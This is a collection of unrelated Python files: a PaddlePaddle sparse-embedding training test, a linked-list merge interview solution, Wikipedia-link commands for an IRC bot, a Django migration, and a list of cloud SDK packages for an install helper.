low=-self.init_scale, high=self.init_scale))
def forward(self, input, label):
x_emb = self.embedding(input)
fc = paddle.matmul(x_emb, self.softmax_weight)
fc = paddle.add(fc, self.softmax_bias)
projection = paddle.reshape(fc, shape=[-1, self.vocab_size])
loss = paddle.nn.functional.softmax_with_cross_entropy(
logits=projection, label=label, soft_label=False)
loss = paddle.reshape(loss, shape=[-1, self.num_steps])
loss = paddle.mean(loss, axis=[0])
loss = paddle.sum(loss)
return loss
# global configs
batch_size = 4
batch_num = 200
hidden_size = 10
vocab_size = 1000
num_steps = 3
init_scale = 0.1
def fake_sample_reader():
def __reader__():
for i in range(batch_num):
x_data = np.arange(num_steps).astype('int64')
y_data = np.arange(1, 1 + num_steps).astype('int64')
yield x_data, y_data
return __reader__
class TestSparseEmbeddingFP64(TestParallelDyGraphRunnerBase):
def get_model(self):
model = SimpleNet(hidden_size=hidden_size,
vocab_size=vocab_size,
num_steps=num_steps,
init_scale=init_scale,
is_sparse=True)
train_reader = paddle.batch(fake_sample_reader(),
batch_size=batch_size,
drop_last=True)
optimizer = paddle.optimizer.SGD(learning_rate=0.001,
parameters=model.parameters())
return model, train_reader, optimizer
def run_one_loop(self, model, optimizer, batch):
x_data = np.array([x[0].reshape(3) for x in batch]).astype('int64')
y_data = np.array([x[1].reshape(3) for x in batch]).astype('int64')
x_data = x_data.reshape((-1, num_steps, 1))
y_data = y_data.reshape((-1, 1))
x = paddle.to_tensor(x_data)
y = paddle.to_tensor(y_data)
dy_loss = model(x, y)
return dy_loss
if __name__ == "__main__":
runtime_main(TestSparseEmbeddingFP64)
|
'''https://app.codesignal.com/interview-practice/task/6rE3maCQwrZS3Mm2H
Note: Your solution should have O(l1.length + l2.length) time
complexity, since this is what you will be asked to accomplish in an
interview.
Given two singly linked lists sorted in non-decreasing order, your
task is to merge them. In other words, return a singly linked list,
also sorted in non-decreasing order, that contains the elements from
both original lists.
Example
For l1 = [1, 2, 3] and l2 = [4, 5, 6], the output should be
mergeTwoLinkedLists(l1, l2) = [1, 2, 3, 4, 5, 6];
For l1 = [1, 1, 2, 4] and l2 = [0, 3, 5], the output should be
mergeTwoLinkedLists(l1, l2) = [0, 1, 1, 2, 3, 4, 5].
Input/Output
[execution time limit] 4 seconds (py3)
[input] linkedlist.integer l1
A singly linked list of integers.
Guaranteed constraints:
0 ≤ list size ≤ 10^4,
-10^9 ≤ element value ≤ 10^9.
[input] linkedlist.integer l2
A singly linked list of integers.
Guaranteed constraints:
0 ≤ list size ≤ 10^4,
-10^9 ≤ element value ≤ 10^9.
[output] linkedlist.integer
A list that contains elements from both l1 and l2, sorted in non-decreasing order.
'''
# Singly-linked lists are already defined with this interface:
# class ListNode(object):
# def __init__(self, x):
# self.value = x
# self.next = None
#
def mergeTwoLinkedLists(l1, l2):
'''Given two singly linked lists sorted in non-decreasing order, your
task is to merge them. In other words, return a singly linked
list, also sorted in non-decreasing order, that contains the
elements from both original lists.
'''
    '''
    Approach: walk both lists with a dummy head node, always linking in the
    smaller of the two current nodes; when one list is exhausted, attach the
    remainder of the other one. Runs in O(l1.length + l2.length) time and
    O(1) extra space.
    '''
    if l1 is None:
        return l2
    if l2 is None:
        return l1
# start is a pointer so we can easily return at the end
start = ListNode(None)
# declare current to track the new list through the traverse
current = start
    while l1 is not None and l2 is not None:
if (l1.value < l2.value):
# link up the lowest of the next two values
current.next = l1
# move current forward
current = current.next
            if l1.next is None:
current.next = l2
break
l1 = l1.next
else:
# mirrored code for the other list
current.next = l2
current = current.next
            if l2.next is None:
current.next = l1
break
l2 = l2.next
return start.next
# Testing
# For l1 = [1, 1, 2, 4] and l2 = [0, 3, 5], the output should be
# mergeTwoLinkedLists(l1, l2) = [0, 1, 1, 2, 3, 4, 5].
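
# A small standalone check (an addition; the CodeSignal platform normally
# supplies ListNode). The class and helpers below exist only so the function
# above can be exercised locally; they mirror the documented interface.
if __name__ == '__main__':
    class ListNode(object):
        def __init__(self, x):
            self.value = x
            self.next = None

    def build(values):
        '''Build a singly linked list from a Python list and return its head.'''
        head = tail = None
        for v in values:
            node = ListNode(v)
            if head is None:
                head = tail = node
            else:
                tail.next = node
                tail = node
        return head

    def to_list(node):
        '''Collect a linked list back into a Python list.'''
        out = []
        while node is not None:
            out.append(node.value)
            node = node.next
        return out

    merged = mergeTwoLinkedLists(build([1, 1, 2, 4]), build([0, 3, 5]))
    print(to_list(merged))  # expected: [0, 1, 1, 2, 3, 4, 5]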
|
# Copyright (c) 2013 Molly White
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
from urllib import parse
def link(c, channel, command_type, line):
'''Return a link to the Wikipedia article; formatted as !link [[Article]]'''
regex = re.compile("!?link\s([\[|\{]{2}(.*)[\]|\}]{2})",re.IGNORECASE)
r = re.search(regex, line)
if r:
article_name = r.group(2)
        if article_name is None:
c.con.say("Please format the command as !link [[article]] or !link {{template}}.", channel)
return 0
else:
article_name = article_name.replace(" ", "_")
url = parse.quote(article_name, safe="/#:")
if "{{" in r.group(1):
url = "http://en.wikipedia.org/wiki/Template:" + url
else:
url = "http://en.wikipedia.org/wiki/" + url
c.con.say(url, channel)
else:
c.con.say("Please format the command as !link [[article]] or !link {{template}}.", channel)
def user(c, channel, command_type, line):
'''Returns a link to the userpage; command formatted as !user Username'''
regex = re.compile("!?user\s(.*)",re.IGNORECASE)
r = re.search(regex, line)
if r:
username = r.group(1)
username = username.strip("[]{}").replace(" ", "_")
url = parse.quote(username, safe="/#:")
url = "http://en.wikipedia.org/wiki/User:" + url
c.con.say(url, channel)
else:
c.con.say("Please format this command as !usertalk username.", channel)
def usertalk(c, channel, command_type, line):
'''Returns a link to the user talk page; command formatted as !usertalk Username'''
regex = re.compile("!?usertalk\s(.*)",re.IGNORECASE)
r = re.search(regex, line)
if r:
username = r.group(1)
username = username.strip("[]{}").replace(" ", "_")
url = parse.quote(username, safe="/#:")
url = "http://en.wikipedia.org/wiki/User_talk:" + url
c.con.say(url, channel)
else:
c.con.say("Please format this command as !usertalk username.", channel)
|
# Generated by Django 2.1.4 on 2019-02-13 05:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0005_alliance'),
]
operations = [
migrations.CreateModel(
name='CommentWords',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('q', models.CharField(max_length=100)),
('comment_words', models.TextField()),
],
),
]
|
# -*- coding: utf-8 -*-
"""
@file
@brief Defines a set of modules for more machine learning or student projects.
"""
from ..installhelper.module_install import ModuleInstall
def cloud_set():
"""
    Modules introduced by students or needed for student projects; requires the modules in set *extended*.
"""
mod = [
ModuleInstall("botocore", "pip", usage="AWS",
purpose="A low-level interface to a growing number of Amazon Web Services. " +
"The botocore package is the foundation for the AWS CLI as well as boto3."),
ModuleInstall("s3transfer", "pip", usage="AWS",
purpose="An Amazon S3 Transfer Manager"),
ModuleInstall("boto3", "pip", usage="AWS",
purpose="A Python interface to Amazon Web Services"),
ModuleInstall("s3fs", "pip", usage="AWS",
purpose="Convenient Filesystem interface over S3"),
ModuleInstall("boto", "pip",
purpose="Amazon Web Services Library"),
ModuleInstall("google-auth-httplib2", "pip", mname="google_auth_httplib2",
purpose="This library provides an httplib2 transport for google-auth."),
ModuleInstall("google-auth", "pip", mname="google_auth",
purpose="This library simplifies using Google’s various server-to-server " +
"authentication mechanisms to access Google APIs."),
ModuleInstall("google-api-python-client", "pip", mname="googleapiclient",
purpose="The Google API Client for Python is a client library for accessing the Plus, " +
"Moderator, and many other Google APIs."),
ModuleInstall("googlemaps", "pip",
purpose="Python client library for Google Maps API Web Services"),
ModuleInstall("python-gmaps", "pip", mname="gmaps",
purpose="Google Maps API client http://python-gmaps.readthedocs.org"),
]
mod.append(ModuleInstall("adal", "pip",
purpose="The ADAL for Python library makes it easy for python application to authenticate " +
"to Azure Active Directory (AAD) in order to access AAD protected web resources."))
mod.append(ModuleInstall("msrest", "pip",
purpose="AutoRest swagger generator Python client runtime."))
mod.append(ModuleInstall("msrestazure", "pip",
purpose="AutoRest swagger generator Python client runtime. Azure-specific module."))
for name in ['azure-nspkg',
'azure-common',
'azure-mgmt-nspkg',
'azure-mgmt-authorization',
'azure-mgmt-common',
'azure-storage',
'azure-mgmt-batch',
'azure-mgmt-cdn',
'azure-mgmt-cognitiveservices',
'azure-mgmt-commerce',
'azure-mgmt-compute',
'azure-mgmt-logic',
'azure-graphrbac',
'azure-mgmt-network',
'azure-mgmt-notificationhubs',
'azure-mgmt-powerbiembedded',
'azure-mgmt-redis',
'azure-mgmt-resource',
'azure-mgmt-scheduler',
'azure-mgmt-storage',
'azure-mgmt-web',
'azure-batch',
'azure-servicebus',
'azure-servicemanagement-legacy',
'azure-mgmt',
# addition 2017-05
"azure-keyvault",
"azure-datalake-store",
"azure-servicefabric",
"azure-mgmt-devtestlabs",
"azure-mgmt-documentdb",
"azure-mgmt-containerregistry",
"azure-mgmt-keyvault",
"azure-mgmt-dns",
"azure-mgmt-datalake-analytics",
"azure-mgmt-datalake-nspkg",
"azure-mgmt-trafficmanager",
"azure-mgmt-rdbms",
"azure-mgmt-datalake-store",
"azure-mgmt-iothub",
"azure-mgmt-sql",
"azure-mgmt-monitor",
# addition 2018-02
'azure_storage_common',
'azure_cosmosdb_nspkg',
'azure_cosmosdb_table',
'azure_eventgrid',
'azure_mgmt_advisor',
'azure_mgmt_applicationinsights',
'azure_mgmt_batchai',
'azure_mgmt_billing',
'azure_mgmt_consumption',
'azure_mgmt_containerinstance',
'azure_mgmt_containerservice',
'azure_mgmt_cosmosdb',
'azure_mgmt_datafactory',
'azure_mgmt_eventgrid',
'azure_mgmt_eventhub',
'azure_mgmt_hanaonazure',
'azure_mgmt_iothubprovisioningservices',
'azure_mgmt_loganalytics',
'azure_mgmt_machinelearningcompute',
'azure_mgmt_managementpartner',
'azure_mgmt_marketplaceordering',
'azure_mgmt_media',
'azure_mgmt_msi',
'azure_mgmt_recoveryservices',
'azure_mgmt_recoveryservicesbackup',
'azure_mgmt_relay',
'azure_mgmt_reservations',
'azure_mgmt_search',
'azure_mgmt_servermanager',
'azure_mgmt_servicebus',
'azure_mgmt_servicefabric',
'azure_mgmt_subscription',
'azure_storage_blob',
'azure_storage_file',
'azure_storage_queue',
'azure-storage-nspkg',
# addition 2019-01
'azure_loganalytics',
'azure_applicationinsights',
'azure_mgmt_iotcentral',
'azure_mgmt_datamigration',
'azure_mgmt_maps',
'azure_mgmt_policyinsights',
'azure_mgmt_managementgroups',
'azure_mgmt_devspaces',
'azure_mgmt_signalr',
]:
# azure part
mname = name.replace("-", ".").replace("_", ".")
if mname in ("azure.nspkg", "azure.mgmt.nspkg",
"azure.servicemanagement.legacy"):
skip_import = True
else:
skip_import = False
if mname == name:
mname = None
m = ModuleInstall(
name, "pip", mname=mname, pip_options=["--pre"],
purpose="Python wrapper for Azure API (HDInsight, Blog Storage)", usage="AZURE",
skip_import=skip_import)
mod.append(m)
mod.append(ModuleInstall("azureml", "pip",
purpose="Microsoft Azure Machine Learning Python client library"))
return [_ for _ in mod if _ is not None]
|